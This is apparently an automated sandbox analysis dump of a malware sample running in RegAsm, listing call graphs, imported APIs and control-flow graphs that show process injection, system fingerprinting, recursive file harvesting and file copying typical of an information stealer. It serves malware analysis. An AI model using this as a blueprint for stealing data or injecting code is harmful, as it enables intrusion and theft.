81850->81851 81852 41058d lstrcpyA 81851->81852 81853 41454b 81852->81853 81854 401cfd lstrcpyA 81853->81854 81855 414560 lstrlenA 81854->81855 81856 4104e7 lstrcpyA 81855->81856 81857 41457d 81856->81857 82563 416e97 81857->82563 82368->81051 82370 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82369->82370 82371 412601 82370->82371 82371->80277 82371->80282 82373 4104e7 lstrcpyA 82372->82373 82374 402a05 82373->82374 82374->81105 82376 4104e7 lstrcpyA 82375->82376 82377 402a16 82376->82377 82377->81105 82379 4104e7 lstrcpyA 82378->82379 82380 402a27 82379->82380 82380->81105 82382 410519 lstrcpyA 82381->82382 82383 416dac 82382->82383 82384 410519 lstrcpyA 82383->82384 82385 416db7 82384->82385 82386 410519 lstrcpyA 82385->82386 82387 416dc2 82386->82387 82387->81153 82388->81105 82389->81105 82390->81105 82392 4116ad 82391->82392 82393 41173c 82391->82393 82395 4104e7 lstrcpyA 82392->82395 82394 4104e7 lstrcpyA 82393->82394 82396 411748 82394->82396 82397 4116c0 _memset 82395->82397 82398 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82396->82398 82408 4123d5 lstrcpyA malloc strncpy 82397->82408 82399 411755 82398->82399 82399->81175 82401 4116ea lstrcatA 82409 402920 82401->82409 82403 411707 lstrcatA 82404 411724 82403->82404 82405 4104e7 lstrcpyA 82404->82405 82406 411732 82405->82406 82406->82396 82407->81177 82408->82401 82410 402924 82409->82410 82410->82403 82412 404ac4 82411->82412 82412->82412 82413 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 82412->82413 82414 404b27 82413->82414 82414->81187 82416 427068 82415->82416 82416->81492 82416->82416 82418 40806a LocalAlloc 82417->82418 82419 406724 82417->82419 82418->82419 82420 40807a CryptStringToBinaryA 82418->82420 82419->81356 82419->81367 82420->82419 82421 408091 LocalFree 82420->82421 82421->82419 82423 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82422->82423 82424 410d2c 82423->82424 82424->81547 82580 423c10 82425->82580 82427 41160c RegOpenKeyExA 82428 411651 CharToOemA 82427->82428 82429 411630 RegQueryValueExA 82427->82429 82431 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82428->82431 82429->82428 82432 411682 82431->82432 82432->81561 82434 412294 82433->82434 82435 412278 K32GetModuleFileNameExA CloseHandle 82433->82435 82436 4104e7 lstrcpyA 82434->82436 82435->82434 82437 4122a0 82436->82437 82438 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82437->82438 82439 4122ae 82438->82439 82439->81604 82582 410c16 82440->82582 82443 410b63 RegOpenKeyExA 82444 410b83 RegQueryValueExA 82443->82444 82445 410b5c 82443->82445 82444->82445 82445->81626 82588 42f109 82446->82588 82448 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 82449 41186b 82448->82449 82450 411873 CoSetProxyBlanket 82449->82450 82453 411964 82449->82453 82456 4118a3 82450->82456 82451 4104e7 lstrcpyA 82452 41198f 82451->82452 82454 42f165 5 API calls 82452->82454 82453->82451 82455 411996 82454->82455 82455->81640 82456->82453 82457 4118d7 VariantInit 82456->82457 82458 4118f6 82457->82458 82589 411757 82458->82589 82460 411901 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 82461 4104e7 lstrcpyA 82460->82461 82462 411958 VariantClear 82461->82462 82462->82452 82598 42f09d 82463->82598 82465 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 82466 4119f9 82465->82466 82467 411a01 CoSetProxyBlanket 82466->82467 82470 411a93 82466->82470 82471 411a31 82467->82471 82468 4104e7 lstrcpyA 82469 411abe 82468->82469 82469->81653 82470->82468 82471->82470 82472 411a59 VariantInit 82471->82472 82473 411a78 82472->82473 82599 411d42 LocalAlloc CharToOemW 82473->82599 82475 411a80 82476 4104e7 lstrcpyA 82475->82476 82477 411a87 VariantClear 82476->82477 82477->82469 82478->81681 82480 4104e7 lstrcpyA 82479->82480 82481 4115cd 82480->82481 82481->81696 82483 4104e7 lstrcpyA 82482->82483 82484 410e02 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 82483->82484 82491 410e3c 82484->82491 82493 410eed 82484->82493 82485 410e42 GetLocaleInfoA 82485->82491 82486 410f05 82488 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82486->82488 82487 410ef9 LocalFree 82487->82486 82490 410f15 82488->82490 82489 410609 lstrlenA lstrcpyA lstrcatA 82489->82491 82490->81710 82491->82485 82491->82489 82492 41058d lstrcpyA 82491->82492 82491->82493 82492->82491 82493->82486 82493->82487 82495 410d86 82494->82495 82496 410d6a wsprintfA 82494->82496 82497 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82495->82497 82496->82495 82498 410d93 82497->82498 82498->81738 82500 410f94 RegQueryValueExA 82499->82500 82501 410fac 82499->82501 82500->82501 82501->81756 82503 41107c GetLogicalProcessorInformationEx 82502->82503 82504 411087 82503->82504 82505 411048 GetLastError 82503->82505 82602 411b5b GetProcessHeap HeapFree 82504->82602 82506 4110f3 82505->82506 82507 411057 82505->82507 82510 4110fd 82506->82510 82603 411b5b GetProcessHeap HeapFree 82506->82603 82509 41105b 82507->82509 82509->82503 82518 4110ec 82509->82518 82600 411b5b GetProcessHeap HeapFree 82509->82600 82601 411b78 GetProcessHeap HeapAlloc 82509->82601 82515 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82510->82515 82511 4110c0 82511->82510 82516 4110c9 wsprintfA 82511->82516 82517 411117 82515->82517 82516->82510 82517->81770 82518->82510 82520 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82519->82520 82521 411005 82520->82521 82521->81784 82604 411b26 82522->82604 82525 41115f wsprintfA 82527 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82525->82527 82528 411190 82527->82528 82528->81798 82530 4104e7 lstrcpyA 82529->82530 82533 4111b3 82530->82533 82531 4111df EnumDisplayDevicesA 82532 4111f3 82531->82532 82531->82533 82534 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82532->82534 82533->82531 82533->82532 82535 410549 2 API calls 82533->82535 82536 411201 82534->82536 82535->82533 82536->81812 82538 4104e7 lstrcpyA 82537->82538 82539 4114c6 CreateToolhelp32Snapshot Process32First 82538->82539 82540 41154c CloseHandle 82539->82540 82546 4114ee 82539->82546 82541 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82540->82541 82543 411561 82541->82543 82542 41153a Process32Next 82542->82540 82542->82546 82543->81826 82544 410609 lstrlenA lstrcpyA lstrcatA 82544->82546 82545 41058d lstrcpyA 82545->82546 82546->82542 82546->82544 82546->82545 82548 4104e7 lstrcpyA 82547->82548 82549 41123b RegOpenKeyExA 82548->82549 82550 411281 82549->82550 82555 41145e 82549->82555 82552 411287 RegEnumKeyExA 82550->82552 82550->82555 82560 41058d lstrcpyA 82550->82560 82561 4113b0 RegQueryValueExA 82550->82561 82562 410609 lstrlenA lstrcpyA lstrcatA 82550->82562 82551 410519 lstrcpyA 82557 411489 82551->82557 82552->82550 82553 4112c4 wsprintfA RegOpenKeyExA 82552->82553 82554 41130a RegQueryValueExA 82553->82554 82553->82555 82554->82550 82556 411340 lstrlenA 82554->82556 82555->82551 82556->82550 82558 41d016 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 82557->82558 82559 4114a3 82558->82559 82559->81840 82560->82550 82561->82550 82562->82550 82564 416ea7 82563->82564 82565 41058d lstrcpyA 82564->82565 82566 416ec4 82565->82566 82567 41058d lstrcpyA 82566->82567 82568 416ee0 82567->82568 82569 41058d lstrcpyA 82568->82569 82570 416eeb 82569->82570 82571 41058d lstrcpyA 82570->82571 82572 416ef6 82571->82572 82581 423c1c 82580->82581 82581->82427 82581->82581 82585 410ba9 GetProcessHeap HeapAlloc RegOpenKeyExA 82582->82585 82584 410b58 82584->82443 82584->82445 82586 410bec RegQueryValueExA 82585->82586 82587 410c03 82585->82587 82586->82587 82587->82584 82588->82448 82597 42f09d 82589->82597 82591 411763 CoCreateInstance 82592 41178b SysAllocString 82591->82592 82593 4117e7 82591->82593 82592->82593 82595 41179a 82592->82595 82593->82460 82594 4117e0 SysFreeString 82594->82593 82595->82594 82596 4117be _wtoi64 SysFreeString 82595->82596 82596->82594 82597->82591 82598->82465 82599->82475 82600->82509 82601->82509 82602->82511 82603->82510 82605 41114d GlobalMemoryStatusEx 82604->82605 82605->82525 84648 6c0fc930 GetSystemInfo VirtualAlloc 84649 6c0fc9a3 GetSystemInfo 84648->84649 84650 6c0fc973 84648->84650 84652 6c0fc9b6 84649->84652 84653 6c0fc9d0 84649->84653 84664 6c11b320 5 API calls ___raise_securityfailure 84650->84664 84652->84653 84656 6c0fc9bd 84652->84656 84653->84650 84654 6c0fc9d8 VirtualAlloc 84653->84654 84657 6c0fc9ec 84654->84657 84658 6c0fc9f0 84654->84658 84655 6c0fc99b 84656->84650 84659 6c0fc9c1 VirtualFree 84656->84659 84657->84650 84665 6c11cbe8 GetCurrentProcess TerminateProcess 84658->84665 84659->84650 84664->84655

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                      • API String ID: 2238633743-2740034357
                                                                                      • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                      • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                      • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                      • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1696 414cc8-414d6f call 42e390 wsprintfA FindFirstFileA call 423c10 * 2 1703 414d75-414d89 StrCmpCA 1696->1703 1704 41512b-415141 call 401cde call 41d016 1696->1704 1706 4150f8-41510d FindNextFileA 1703->1706 1707 414d8f-414da3 StrCmpCA 1703->1707 1708 41511f-415125 FindClose 1706->1708 1709 41510f-415111 1706->1709 1707->1706 1711 414da9-414deb wsprintfA StrCmpCA 1707->1711 1708->1704 1709->1703 1713 414e0a-414e1c wsprintfA 1711->1713 1714 414ded-414e08 wsprintfA 1711->1714 1715 414e1f-414e5c call 423c10 lstrcatA 1713->1715 1714->1715 1719 414e82-414e89 strtok_s 1715->1719 1720 414e8b-414ec9 call 423c10 lstrcatA strtok_s 1719->1720 1721 414e5e-414e6f 1719->1721 1726 415089-41508d 1720->1726 1727 414ecf-414edf PathMatchSpecA 1720->1727 1725 414e75-414e81 1721->1725 1721->1726 1725->1719 1726->1706 1728 41508f-415095 1726->1728 1729 414ee5-414fbe call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 call 412166 call 42efc0 1727->1729 1730 414fd9-414fee strtok_s 1727->1730 1728->1708 1732 41509b-4150a9 1728->1732 1768 414fc0-414fd4 call 402920 1729->1768 1769 414ff9-415005 1729->1769 1730->1727 1731 414ff4 1730->1731 1731->1726 1732->1706 1734 4150ab-4150ed call 401cfd call 414cc8 1732->1734 1743 4150f2 1734->1743 1743->1706 1768->1730 1770 415116-41511d call 402920 1769->1770 1771 41500b-415031 call 410519 call 407fac 1769->1771 1770->1704 1781 415033-415077 call 401cfd call 4104e7 call 416e97 call 402920 1771->1781 1782 41507d-415084 call 402920 1771->1782 1781->1782 1782->1726
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 00414D1C
                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                      • _memset.LIBCMT ref: 00414D4F
                                                                                      • _memset.LIBCMT ref: 00414D60
                                                                                      • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                      • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                      • wsprintfA.USER32 ref: 00414DC2
                                                                                      • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                      • wsprintfA.USER32 ref: 00414DFF
                                                                                      • wsprintfA.USER32 ref: 00414E16
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                      • _memset.LIBCMT ref: 00414E28
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                      • strtok_s.MSVCRT ref: 00414E82
                                                                                      • _memset.LIBCMT ref: 00414E94
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                      • strtok_s.MSVCRT ref: 00414EC2
                                                                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                      • strtok_s.MSVCRT ref: 00414FE7
                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                      • FindClose.KERNEL32(?), ref: 00415125
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memsetlstrcatwsprintf$FileFindlstrcpystrtok_s$CloseCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                      • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                      • API String ID: 2867719434-332874205
                                                                                      • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                      • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                      • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                      • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1793 40884c-408865 call 410795 1796 408867-40886c 1793->1796 1797 40886e-40887e call 410795 1793->1797 1798 408885-40888d call 410549 1796->1798 1803 408880 1797->1803 1804 40888f-40889f call 410795 1797->1804 1805 4088a5-408922 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 1798->1805 1803->1798 1804->1805 1809 408d72-408d96 call 402920 * 3 call 401cde 1804->1809 1841 408939-408949 CopyFileA 1805->1841 1842 408924-408936 call 410519 call 4122b0 1841->1842 1843 40894b-408984 call 4104e7 call 410609 call 41058d call 402920 1841->1843 1842->1841 1856 408986-4089d7 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d 1843->1856 1857 4089dc-408a5b call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 410609 call 41058d call 402920 1843->1857 1890 408a60-408a79 call 402920 1856->1890 1857->1890 1900 408d4b-408d57 DeleteFileA call 402920 1890->1900 1901 408a7f-408a9a 1890->1901 1904 408d5c-408d6b call 402920 * 2 1900->1904 1907 408aa0-408ab6 GetProcessHeap RtlAllocateHeap 1901->1907 1908 408d37-408d4a 1901->1908 1919 408d6d call 402920 1904->1919 1911 408cda-408ce7 1907->1911 1908->1900 1917 408abb-408b9d call 4104e7 * 6 call 401cfd call 410519 call 40826d StrCmpCA 1911->1917 1918 408ced-408cf9 lstrlenA 1911->1918 1956 408ba3-408bb6 StrCmpCA 1917->1956 1957 408d97-408dd9 call 402920 * 8 1917->1957 1918->1908 1921 408cfb-408d27 call 401cfd lstrlenA call 410519 call 416e97 1918->1921 1919->1809 1933 408d2c-408d32 call 402920 1921->1933 1933->1908 1959 408bc0 1956->1959 1960 408bb8-408bbe 1956->1960 1957->1919 1962 408bc6-408bde call 410549 StrCmpCA 1959->1962 1960->1962 1968 408be0-408be6 1962->1968 1969 408be8 1962->1969 1971 408bee-408bf9 call 410549 1968->1971 1969->1971 1977 408c08-408cd5 lstrcatA * 14 call 402920 * 7 1971->1977 1978 408bfb-408c03 call 410549 1971->1978 1977->1911 1978->1977
                                                                                      APIs
                                                                                        • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,004371C4,004367CF,?,?,?), ref: 00408941
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                        • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                        • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                        • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                      • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                      • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                      • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                      • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                      • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                      • String ID: ERROR_RUN_EXTRACTOR
                                                                                      • API String ID: 2819533921-2709115261
                                                                                      • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                      • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                      • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                      • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2000 409d1c-409dd5 call 4104e7 call 4105c7 call 410609 call 41058d call 402920 * 2 call 4104e7 * 2 FindFirstFileA 2017 40a788-40a7d7 call 402920 * 3 call 401cde call 402920 * 3 call 41d016 2000->2017 2018 409ddb-409def StrCmpCA 2000->2018 2019 40a761-40a776 FindNextFileA 2018->2019 2020 409df5-409e09 StrCmpCA 2018->2020 2019->2018 2022 40a77c-40a782 FindClose 2019->2022 2020->2019 2023 409e0f-409e85 call 410549 call 4105c7 call 410609 * 2 call 41058d call 402920 * 3 2020->2023 2022->2017 2055 409e8b-409ea1 StrCmpCA 2023->2055 2056 409f8e-40a002 call 410609 * 4 call 41058d call 402920 * 3 2023->2056 2057 409ea3-409f13 call 410609 * 4 call 41058d call 402920 * 3 2055->2057 2058 409f18-409f8c call 410609 * 4 call 41058d call 402920 * 3 2055->2058 2107 40a008-40a01d call 402920 StrCmpCA 2056->2107 2057->2107 2058->2107 2110 40a023-40a037 StrCmpCA 2107->2110 2111 40a1ef-40a204 StrCmpCA 2107->2111 2110->2111 2114 40a03d-40a173 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 call 4104e7 call 410609 * 2 call 41058d call 402920 * 2 call 410519 call 407fac 2110->2114 2112 40a206-40a249 call 401cfd call 410519 * 3 call 40852e 2111->2112 2113 40a259-40a26e StrCmpCA 2111->2113 2172 40a24e-40a254 2112->2172 2115 40a270-40a281 StrCmpCA 2113->2115 2116 40a2cf-40a2e9 call 410519 call 411d92 2113->2116 2304 40a175-40a1b3 call 401cfd call 410519 call 416e97 call 402920 2114->2304 2305 40a1b8-40a1ea call 402920 * 3 2114->2305 2119 40a6d0-40a6d7 2115->2119 2120 40a287-40a28b 2115->2120 2143 40a2eb-40a2ef 2116->2143 2144 40a34f-40a364 StrCmpCA 2116->2144 2124 40a731-40a75b call 402920 * 2 2119->2124 2125 40a6d9-40a726 call 401cfd call 410519 * 2 call 4104e7 call 409d1c 2119->2125 2120->2119 2126 40a291-40a2cd call 401cfd call 410519 * 2 2120->2126 2124->2019 2194 40a72b 2125->2194 2177 40a335-40a33f call 410519 call 40884c 2126->2177 2143->2119 2152 40a2f5-40a32f call 401cfd call 410519 call 4104e7 2143->2152 2149 40a546-40a55b StrCmpCA 2144->2149 2150 40a36a-40a426 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 2144->2150 2149->2119 2163 40a561-40a61d call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 2149->2163 2251 40a4b9-40a4c9 StrCmpCA 2150->2251 2252 40a42c-40a4b3 call 401cfd call 410519 * 3 call 408ddb call 401cfd call 410519 * 3 call 409549 2150->2252 2152->2177 2254 40a623-40a65d call 401cfd call 410519 * 3 call 409072 2163->2254 2255 40a6a4-40a6b6 DeleteFileA call 402920 2163->2255 2172->2119 2199 40a344-40a34a 2177->2199 2194->2124 2199->2119 2258 40a4cb-40a516 call 401cfd call 410519 * 3 call 409a0e 2251->2258 2259 40a51c-40a52e DeleteFileA call 402920 2251->2259 2252->2251 2302 40a662-40a69e call 401cfd call 410519 * 3 call 4092a7 2254->2302 2270 40a6bb-40a6c2 2255->2270 2258->2259 2269 40a533-40a541 2259->2269 2276 40a6c9-40a6cb call 402920 2269->2276 2270->2276 2276->2119 2302->2255 2304->2305 2305->2111
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
